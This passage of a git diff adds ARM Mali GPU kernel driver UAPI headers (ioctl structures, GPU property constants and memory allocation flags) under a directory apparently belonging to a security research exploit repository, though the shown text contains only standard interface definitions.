+ * @handle: GPU memory handle (GPU VA)
+ * @user_addr: The address where it is mapped in user space
+ * @size: The number of bytes to synchronise
+ * @type: The direction to synchronise: 0 is sync to memory (clean),
+ * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero
+ */
+struct kbase_ioctl_mem_sync {
+ __u64 handle;
+ __u64 user_addr;
+ __u64 size;
+ __u8 type;
+ __u8 padding[7];
+};
+
+#define KBASE_IOCTL_MEM_SYNC \
+ _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
+
+/**
+ * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
+ *
+ * @in: Input parameters
+ * @in.gpu_addr: The GPU address of the memory region
+ * @in.cpu_addr: The CPU address to locate
+ * @in.size: A size in bytes to validate is contained within the region
+ * @out: Output parameters
+ * @out.offset: The offset from the start of the memory region to @cpu_addr
+ */
+union kbase_ioctl_mem_find_cpu_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 cpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
+
+/**
+ * struct kbase_ioctl_get_context_id - Get the kernel context ID
+ *
+ * @id: The kernel context ID
+ */
+struct kbase_ioctl_get_context_id {
+ __u32 id;
+};
+
+#define KBASE_IOCTL_GET_CONTEXT_ID \
+ _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
+
+/**
+ * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
+ *
+ * @flags: Flags
+ *
+ * The ioctl returns a file descriptor when successful
+ */
+struct kbase_ioctl_tlstream_acquire {
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
+ _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
+
+#define KBASE_IOCTL_TLSTREAM_FLUSH \
+ _IO(KBASE_IOCTL_TYPE, 19)
+
+/**
+ * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
+ *
+ * @gpu_addr: The memory region to modify
+ * @pages: The number of physical pages that should be present
+ *
+ * The ioctl may return on the following error codes or 0 for success:
+ * -ENOMEM: Out of memory
+ * -EINVAL: Invalid arguments
+ */
+struct kbase_ioctl_mem_commit {
+ __u64 gpu_addr;
+ __u64 pages;
+};
+
+#define KBASE_IOCTL_MEM_COMMIT \
+ _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
+
+/**
+ * union kbase_ioctl_mem_alias - Create an alias of memory regions
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.stride: Bytes between start of each memory region
+ * @in.nents: The number of regions to pack together into the alias
+ * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_alias {
+ struct {
+ __u64 flags;
+ __u64 stride;
+ __u64 nents;
+ __u64 aliasing_info;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALIAS \
+ _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
+
+enum base_mem_import_type {
+ BASE_MEM_IMPORT_TYPE_INVALID = 0,
+ /*
+ * Import type with value 1 is deprecated.
+ */
+ BASE_MEM_IMPORT_TYPE_UMM = 2,
+ BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3
+};
+
+/**
+ * struct base_mem_import_user_buffer - Handle of an imported user buffer
+ *
+ * @ptr: address of imported user buffer
+ * @length: length of imported user buffer in bytes
+ *
+ * This structure is used to represent a handle of an imported user buffer.
+ */
+
+struct base_mem_import_user_buffer {
+ __u64 ptr;
+ __u64 length;
+};
+
+/**
+ * union kbase_ioctl_mem_import - Import memory for use by the GPU
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.phandle: Handle to the external memory
+ * @in.type: Type of external memory, see base_mem_import_type
+ * @in.padding: Amount of extra VA pages to append to the imported buffer
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_import {
+ struct {
+ __u64 flags;
+ __u64 phandle;
+ __u32 type;
+ __u32 padding;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_IMPORT \
+ _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
+
+/**
+ * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
+ * @gpu_va: The GPU region to modify
+ * @flags: The new flags to set
+ * @mask: Mask of the flags to modify
+ */
+struct kbase_ioctl_mem_flags_change {
+ __u64 gpu_va;
+ __u64 flags;
+ __u64 mask;
+};
+
+#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
+ _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
+
+/**
+ * struct kbase_ioctl_stream_create - Create a synchronisation stream
+ * @name: A name to identify this stream. Must be NULL-terminated.
+ *
+ * Note that this is also called a "timeline", but is named stream to avoid
+ * confusion with other uses of the word.
+ *
+ * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes.
+ *
+ * The ioctl returns a file descriptor.
+ */
+struct kbase_ioctl_stream_create {
+ char name[32];
+};
+
+#define KBASE_IOCTL_STREAM_CREATE \
+ _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
+
+/**
+ * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
+ * @fd: The file descriptor to validate
+ */
+struct kbase_ioctl_fence_validate {
+ int fd;
+};
+
+#define KBASE_IOCTL_FENCE_VALIDATE \
+ _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
+
+/**
+ * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
+ * @buffer: Pointer to the information
+ * @len: Length
+ * @padding: Padding
+ *
+ * The data provided is accessible through a debugfs file
+ */
+struct kbase_ioctl_mem_profile_add {
+ __u64 buffer;
+ __u32 len;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_MEM_PROFILE_ADD \
+ _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to map
+ */
+struct kbase_ioctl_sticky_resource_map {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
+ _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was
+ * previously permanently mapped
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to unmap
+ */
+struct kbase_ioctl_sticky_resource_unmap {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
+ _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
+
+/**
+ * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
+ * the GPU memory region for
+ * the given gpu address and
+ * the offset of that address
+ * into the region
+ * @in: Input parameters
+ * @in.gpu_addr: GPU virtual address
+ * @in.size: Size in bytes within the region
+ * @out: Output parameters
+ * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
+ * for the length of @offset bytes
+ * @out.offset: The offset from the start of the memory region to @gpu_addr
+ */
+union kbase_ioctl_mem_find_gpu_start_and_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 start;
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
+
+#define KBASE_IOCTL_CINSTR_GWT_START \
+ _IO(KBASE_IOCTL_TYPE, 33)
+
+#define KBASE_IOCTL_CINSTR_GWT_STOP \
+ _IO(KBASE_IOCTL_TYPE, 34)
+
+/**
+ * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
+ * @in: Input parameters
+ * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
+ * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
+ * @in.len: Number of addresses the buffers can hold.
+ * @in.padding: padding
+ * @out: Output parameters
+ * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
+ * @out.more_data_available: Status indicating if more addresses are available.
+ * @out.padding: padding
+ *
+ * This structure is used when performing a call to dump GPU write fault
+ * addresses.
+ */
+union kbase_ioctl_cinstr_gwt_dump {
+ struct {
+ __u64 addr_buffer;
+ __u64 size_buffer;
+ __u32 len;
+ __u32 padding;
+
+ } in;
+ struct {
+ __u32 no_of_addr_collected;
+ __u8 more_data_available;
+ __u8 padding[27];
+ } out;
+};
+
+#define KBASE_IOCTL_CINSTR_GWT_DUMP \
+ _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
+
+/**
+ * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
+ *
+ * @va_pages: Number of VA pages to reserve for EXEC_VA
+ */
+struct kbase_ioctl_mem_exec_init {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_EXEC_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
+
+/**
+ * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
+ * cpu/gpu time (counter values)
+ * @in: Input parameters
+ * @in.request_flags: Bit-flags indicating the requested types.
+ * @in.paddings: Unused, size alignment matching the out.
+ * @out: Output parameters
+ * @out.sec: Integer field of the monotonic time, unit in seconds.
+ * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
+ * @out.padding: Unused, for __u64 alignment
+ * @out.timestamp: System wide timestamp (counter) value.
+ * @out.cycle_counter: GPU cycle counter value.
+ */
+union kbase_ioctl_get_cpu_gpu_timeinfo {
+ struct {
+ __u32 request_flags;
+ __u32 paddings[7];
+ } in;
+ struct {
+ __u64 sec;
+ __u32 nsec;
+ __u32 padding;
+ __u64 timestamp;
+ __u64 cycle_counter;
+ } out;
+};
+
+#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
+ _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
+
+/**
+ * struct kbase_ioctl_context_priority_check - Check the max possible priority
+ * @priority: Input priority & output priority
+ */
+
+struct kbase_ioctl_context_priority_check {
+ __u8 priority;
+};
+
+#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
+
+/**
+ * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
+ *
+ * @max_core_count: Maximum core count
+ */
+struct kbase_ioctl_set_limited_core_count {
+ __u8 max_core_count;
+};
+
+#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
+ _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
+
+
+/***************
+ * Pixel ioctls *
+ ***************/
+
+/**
+ * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
+ *
+ * @dur_usec: Duration for GPU to stay awake.
+ */
+struct kbase_ioctl_apc_request {
+ __u32 dur_usec;
+};
+
+#define KBASE_IOCTL_APC_REQUEST \
+ _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
+
+/***************
+ * test ioctls *
+ ***************/
+#if MALI_UNIT_TEST
+/* These ioctls are purely for test purposes and are not used in the production
+ * driver, they therefore may change without notice
+ */
+
+#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
+
+
+/**
+ * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
+ * @bytes_collected: number of bytes read by user
+ * @bytes_generated: number of bytes generated by tracepoints
+ */
+struct kbase_ioctl_tlstream_stats {
+ __u32 bytes_collected;
+ __u32 bytes_generated;
+};
+
+#define KBASE_IOCTL_TLSTREAM_STATS \
+ _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
+
+#endif /* MALI_UNIT_TEST */
+
+/* Customer extension range */
+#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
+
+/* If the integration needs extra ioctl add them there
+ * like this:
+ *
+ * struct my_ioctl_args {
+ * ....
+ * }
+ *
+ * #define KBASE_IOCTL_MY_IOCTL \
+ * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
+ */
+
+
+/**********************************
+ * Definitions for GPU properties *
+ **********************************/
+#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
+#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
+#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
+#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
+
+#define KBASE_GPUPROP_PRODUCT_ID 1
+#define KBASE_GPUPROP_VERSION_STATUS 2
+#define KBASE_GPUPROP_MINOR_REVISION 3
+#define KBASE_GPUPROP_MAJOR_REVISION 4
+/* 5 previously used for GPU speed */
+#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
+/* 7 previously used for minimum GPU speed */
+#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
+#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
+#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
+#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
+#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
+
+#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
+#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
+#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
+
+#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
+#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
+
+#define KBASE_GPUPROP_MAX_THREADS 18
+#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
+#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
+#define KBASE_GPUPROP_MAX_REGISTERS 21
+#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
+#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
+#define KBASE_GPUPROP_IMPL_TECH 24
+
+#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
+#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
+#define KBASE_GPUPROP_RAW_L2_PRESENT 27
+#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
+#define KBASE_GPUPROP_RAW_L2_FEATURES 29
+#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
+#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
+#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
+#define KBASE_GPUPROP_RAW_AS_PRESENT 33
+#define KBASE_GPUPROP_RAW_JS_PRESENT 34
+#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
+#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
+#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
+#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
+#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
+#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
+#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
+#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
+#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
+#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
+#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
+#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
+#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
+#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
+#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
+#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
+#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
+#define KBASE_GPUPROP_RAW_GPU_ID 55
+#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
+#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
+#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
+#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
+#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
+
+#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
+#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
+#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
+#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
+#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
+#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
+#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
+#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
+#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
+#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
+#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+
+#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h
new file mode 100644
index 0000000..b1cf438
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h
@@ -0,0 +1,1216 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_JM_KERNEL_H_
+#define _UAPI_BASE_JM_KERNEL_H_
+
+#include
+
+typedef __u32 base_mem_alloc_flags;
+/* Memory allocation, access/hint flags.
+ *
+ * See base_mem_alloc_flags.
+ */
+
+/* IN */
+/* Read access CPU side
+ */
+#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
+
+/* Write access CPU side
+ */
+#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
+
+/* Read access GPU side
+ */
+#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
+
+/* Write access GPU side
+ */
+#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
+
+/* Execute allowed on the GPU side
+ */
+#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
+
+/* Will be permanently mapped in kernel space.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
+
+/* The allocation will completely reside within the same 4GB chunk in the GPU
+ * virtual space.
+ * Since this flag is primarily required only for the TLS memory which will
+ * not be used to contain executable code and also not used for Tiler heap,
+ * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
+ */
+#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
+
+/* Userspace is not allowed to free this memory.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
+
+#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
+
+/* Grow backing store on GPU Page Fault
+ */
+#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
+
+/* Page coherence Outer shareable, if available
+ */
+#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
+
+/* Page coherence Inner shareable
+ */
+#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
+
+/* IN/OUT */
+/* Should be cached on the CPU, returned if actually cached
+ */
+#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
+
+/* IN/OUT */
+/* Must have same VA on both the GPU and the CPU
+ */
+#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
+
+/* OUT */
+/* Must call mmap to acquire a GPU address for the allocation
+ */
+#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
+
+/* IN */
+/* Page coherence Outer shareable, required.
+ */
+#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
+
+/* Protected memory
+ */
+#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
+
+/* Not needed physical memory
+ */
+#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
+
+/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
+ * addresses to be the same
+ */
+#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
+
+/**
+ * Bit 19 is reserved.
+ *
+ * Do not remove, use the next unreserved bit for new flags
+ */
+#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
+
+/**
+ * Memory starting from the end of the initial commit is aligned to 'extension'
+ * pages, where 'extension' must be a power of 2 and no more than
+ * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
+
+/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
+ * mode. Some components within the GPU might only be able to access memory
+ * that is GPU cacheable. Refer to the specific GPU implementation for more
+ * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail
+ * if the memory is not aligned to GPU and CPU cache line width.
+ */
+#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
+
+/*
+ * Bits [22:25] for group_id (0~15).
+ *
+ * base_mem_group_id_set() should be used to pack a memory group ID into a
+ * base_mem_alloc_flags value instead of accessing the bits directly.
+ * base_mem_group_id_get() should be used to extract the memory group ID from
+ * a base_mem_alloc_flags value.
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK \
+ ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* Use the GPU VA chosen by the kernel client */
+#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Force trimming of JIT allocations when creating a new allocation */
+#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+ (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
+ BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+ (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED \
+ (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
+
+#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
+#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
+/* reserved handles ..-47< for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << 12)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
+ BASE_MEM_COOKIE_BASE)
+
+/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
+ * initial commit is aligned to 'extension' pages, where 'extension' must be a power
+ * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
+
+/**
+ * If set, the heap info address points to a __u32 holding the used size in bytes;
+ * otherwise it points to a __u64 holding the lowest address of unused memory.
+ */
+#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
+
+/**
+ * Valid set of just-in-time memory allocation flags
+ *
+ * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
+ * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
+ * and heap_info_gpu_addr being 0 will be rejected).
+ */
+#define BASE_JIT_ALLOC_VALID_FLAGS \
+ (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
+
+/**
+ * typedef base_context_create_flags - Flags to pass to ::base_context_init.
+ *
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
+ ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+ ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+ (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
+ BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Bitpattern describing the ::base_context_create_flags that can be
+ * passed to base_context_init()
+ */
+#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
+ (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
+
